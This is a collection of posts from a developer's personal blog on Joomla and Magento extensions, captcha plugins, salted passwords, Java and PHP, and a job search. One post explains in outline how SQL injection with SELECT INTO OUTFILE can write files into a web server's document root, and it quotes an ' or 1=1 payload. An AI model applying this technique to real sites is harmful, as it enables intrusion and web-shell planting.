who needs social life when you have broadband?

Hello,

I forgot to blog about this here (posted only in my portuguese blog :/) but I’ve been working in a Magento+Joomla! integration using JFusion. I’m coding this in my free time, as a hobby. This morning I’ve managed to get login working and I would love if some of you could help me testing before releasing anything to public.

As this a pre-alpha version, there won’t be a “one-click install” or anything. So, I expect that experience programmers could help me test and improve this plugin. Credits will be given, of course.

If you are interested in help, drop me a line: bigodines ~at~ joomla.com.br

The Dev team has just released Joomla! 1.5 stable. This is great news (after two and a half years of development we finally can use the new baby in production environment) but I’ve seen that an old problem hasn’t been solved yet: people still get a lot of spam due to a weak (or nonexistent) mechanism to check if the e-mails sent through com_contact are from real people or spambots.

The beauty of open source is that anyone can change and improve a piece of software. So, here’s my $0.02: changing com_contact to make it can work with your favorite Captcha Plugin! (all files are downloadable at the end of this article)
Read more

Long time without new posts in my english blog sorry about that guys. I’ve been busy with the portuguese blog (wich gives me more feedback than this one…)

Last week I discovered Magento. This is the best opensource eCommerce I’ve seen so far. Unfortunately I haven’t seen to much activity by the core (three days and no commits in the SVN repository and none tested my sugestions to the code..). I guess it must be the holidays.

Anyways, the beuty of opensource is collaboration. So I started doing my part and implemented salted password in Magento.

Why?

We all know that Rainbow Tables are getting bigger and bigger everyday and while studying magento’s code I realised that they were storing password using a simple md5() function. That can be quite dangerous specially for a ecommerce software :).

In a couple hours I came up with this simple solution to implement salted passwords without messing Magento’s Core package (although you will need to change the database, so PLEASE!! I’M BEGGING YOU TO CREATE A BACKUP BEFORE TRYING THIS!)

Here is the README file:

Salted Passwords in Magento
—————————-

This is a hack. There are no guarantees that your system will remain working smoothly

Install
——–

1 - Make sure you change the size of your password field. You may run something like this in your MySQL:

ALTER TABLE `admin_user` CHANGE `password` `password` VARCHAR( 60 )

2 - Sign in in Magento admin (this is important because you’ll need to create a new user to start using salted passwords)

3 - Untar/Unzip this file in your root magento folder (all files will be placed under /community/ directory so u won’t loose anyting if it doesn’t work)

4 - Create a new magento user and give him administrator privileges (your current user won’t work anymore unless you change its password)

FAQ
—-

Q - I cannot login anymore!
A - I TOLD YOU TO LOGIN BEFORE UNZIPPING, you cannot login because the current users don’t use salted passwords and the new authentication method does. Here’s a workaround for this problem:

- Go to your phpMyAdmin (or any other software you use to manage your MySQL database)
- Browse the admin_user table
- Change your user’s password to: 5cf88201ea7be9037b934ec850c01a89:pQEuqfwbpJ
- Your new password is “changeMe” (without quotes)
- Login and change your password to the old one.

Now that you’ve read the README file you are ready to download and try salted passwords for Magento 0.7.1800

Download it here and let me know if it worked for you as well as it worked for me

Hello!

I’m not sure if this post is going to help me or not but I’m blogging anyway

Fact is I wanna move to Canada. I had enough of hot summer and would like to experience living abroad (again). So, if you are a Canadian please check my résumé clicking here and hire me hehehe. If you want, you may contact me directly by e-mail: bigodines ||at|| joomla.com.br

If you’re not sure if it will be worth to read my resume, I’m the main developer of two of the most famous Joomla! sites around the globe: Porsche and UNRIC (please note: developer != designer). Ok, that sound like I’m trying to impress :/. I don’t like these self-promotion lines but sometimes we need it

Now, the bad news:
I’ve been reading about visas and it seems that a permanent work-permit for skilled professionals (According to those HSMP calculators I found on the web I am a skilled professional :-P) can take up to 14 months. A friend told me that if I manage to find a company interested in my services, this waiting time may be shorter (I’m still checking this information).

There is also another alternative: I can go to Canada as a student and work legally 20hrs/week while waiting for my permanent visa… but first I need some networking contacts in Canada.

drop me a line if you need a responsible, dynamic, nerd web developer

today I’ve created my first Joomla! 1.5 extension. It’s a Captcha plugin. My friends were complaining that it was impossible to comment on my portuguese blog so I created this quick-and-funny captcha plugin which can be used with yvComment (or any component you want, because it is really generic).

I’m using the same structure as OSTCaptcha by CoolAcid, so the replacement should be transparent.

Download is available here

You may see a demo visiting my portuguese blog (see the comment plugin..)

Hello, this is my redemption post since the long time without activity on the blog. I’m working on complete Python genetic algorithms framework with many features, for a while is still under development, but there is an alpha version and some examples at the Google project hosting.

I’m doing the best efforts to release new versions soon as possible; I hope that this project will be used, since there are not good frameworks of GAs with easy use fashion in languages like Python.

http://code.google.com/p/pyevolve/

- Perone

Today I’ve finished migrating JGroups-ME to version 2.4.1sp4 of JGroups. I’ve also finished porting the GossipRouter (created a MobileGossipRouter midlet that initializes it) and now we have a 100% mobile group communication toolkit which allows the creation of group communication systems for mobile computing!

Next step is to implement Bluetooth support (I’ll do this just after I finish writing my paper about JGroups-ME) and submit my version to the JGroups project so they can take a look and (maybe) commit to the official JGroups-ME version.

more on this subject soon. please stay tunned ;P

There are some tragic yet very interesting stuff happening to me.

As my undergrad project involves creating a group communication mechanism for mobile devices, I’m trying to become a Java programmer. I’ve never liked Java and you probably already know that. I don’t like it because it is slow and has too many fancy names for simple stuff (I guess this is just to increase the learning curve so Sun partners can sell more courses…). BUT, programming in JavaME is forcing me to practice/remember/learn a lot of techniques and algorithms I’ve never though I would need. So I’m almost saying that it is exciting to program in java (for mobile devices!! the standard edition still sux a lot).

I’m a programmer since I was 15 (7yrs ago), I started with mIRC Scripting (good times..) then I’ve learned PHP, C (in college.. I’ve used it professionally only once, to develop a socket client-server application), Java and Python (which I use just for fun…) in that order. Although I don’t consider myself a good programmer, I can say I’m proficient in PHP (it’s been 5yrs now since I wrote my first mysql_fetch_array() snippet :P). The fact is that, except for C, all these languages give you so much build-in features and facilities that you forget some basic principles of programming.

I would dare to say that it is impossible to become a good programmer if you only know how to program in PHP, for example (and “writing applications that work”, doesn’t make you a good programmer), because it makes programming too easy and too fast. You boss will like it and if you need some simple applications this is good enough, but if you learn PHP as a 1st language you probably won’t know how to optimize your code or will get crazy when you face more complex situations.

Even these JavaEE devs who think they are better than the rest of humanity should try to learn some “low level” algorithms (such as binary trees, linked lists, sockets, threading internals, schedule, etecetera) because learning how to use an API is pretty easy compared to how to implement these APIs

I’m not against PHP or Python and its classes/modules that make our life easier. I’m just concerned about learning how to use this stuff without knowing how they were made…

Here are my conclusions:
- There are languages that make you a faster programmer (or not)
- There are languages that make you a better programmer (or not)
- If I would need to choose between a JavaME and a JavaSE/JavaEE programmer I would definitely choose the JavaME programmer because he *should* write a more efficient code. And it is easier to teach someone how to use an API than teach someone how to implement a serialization mechanism and send objects through the network.
- I’m a terrible english wirter I’m considering start blogging in portuguese…

We all know SQL Injection and a bunch of techniques to exploit this... I've decided to blog about a "new" one. Please don't consider this as "advanced sql injection" because its not

MySQL is a great database management system and it allows you to do many things with the "select" statement, wouldn't it be TOO many things?

I guess everyone knows the basic "' or 1=1 /*" an its variants... but accessing restricted areas, changing user infos and dropping tables aren't the only cool stuff you can do with sql injections.

There is a feature that allows you to save your select into a file. It's called SELECT INTO FILE (duh!) and things can get pretty dangerous if you use it with a sql injection.

Isn't it clear enough yet? Ok, let me try to help you get the big picture.

what if someone inserts this code:

please notice that you'll need to know the documentroot path but this shouldn't be a problem with vulnerable php systems.

Well, I'm not intended to give you a cookbook and promote n00bism. So, if you still didn't figure out how to take advantage of this, you probably shouldn't use it. Google might help you as well

happy hacking.

PS: syntax errors were generated on purpose.

Rember when I said I've found the best image generator class? It turned out that this class isn't everything I said previously. Actually it promises a lot of stuff, but still have too many bugs (for example, you cannot create a simple png with transparent background and I've also had trouble centralizing my text).

At least this class was well written and has been easy to customize.